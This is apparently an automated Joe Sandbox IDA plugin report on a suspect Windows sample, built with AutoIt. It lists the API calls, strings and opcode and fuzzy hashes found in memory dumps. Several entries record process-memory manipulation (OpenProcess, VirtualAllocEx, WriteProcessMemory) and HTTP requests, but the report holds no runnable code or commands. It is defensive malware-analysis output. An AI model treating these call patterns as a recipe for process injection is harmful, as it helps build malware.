                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4247068974-0
                                                                                                                  • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                  • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                  • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                  • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: )$U$\
                                                                                                                  • API String ID: 0-3705770531
                                                                                                                  • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                  • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                                  • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                  • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                  • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 886957087-24824748
                                                                                                                  • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                  • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                  • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                  • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                  Strings
                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                  • API String ID: 708495834-557222456
                                                                                                                  • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                  • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                  • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                  • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: \$]$h
                                                                                                                  • API String ID: 4104443479-3262404753
                                                                                                                  • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                  • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                  • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                  • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                  APIs
                                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                  • String ID: <$@
                                                                                                                  • API String ID: 2417854910-1426351568
                                                                                                                  • Opcode ID: c74d9848bc40b82e3fbf7b03d3cfd3af39385c8d101f10b5b521061fd4332237
                                                                                                                  • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                  • Opcode Fuzzy Hash: c74d9848bc40b82e3fbf7b03d3cfd3af39385c8d101f10b5b521061fd4332237
                                                                                                                  • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                  APIs
                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3705125965-3916222277
                                                                                                                  • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                  • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                  • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                  • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Delete$InfoItem
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 135850232-4108050209
                                                                                                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long
                                                                                                                  • String ID: SysTreeView32
                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                  • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                  • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                  • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                  • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                  • String ID: AU3_GetPluginDetails
                                                                                                                  • API String ID: 145871493-4132174516
                                                                                                                  • Opcode ID: 03e7fe485e9bc45247c3b3aa29fac3b415dc3f1722914e7cc9cf98b8dea861c4
                                                                                                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                  • Opcode Fuzzy Hash: 03e7fe485e9bc45247c3b3aa29fac3b415dc3f1722914e7cc9cf98b8dea861c4
                                                                                                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window
                                                                                                                  • String ID: SysMonthCal32
                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                  • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                  • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                  • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                  • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DestroyWindow
                                                                                                                  • String ID: msctls_updown32
                                                                                                                  • API String ID: 3375834691-2298589950
                                                                                                                  • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                  • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                  • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                  • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: $<
                                                                                                                  • API String ID: 4104443479-428540627
                                                                                                                  • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                  • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                                  • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                  • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
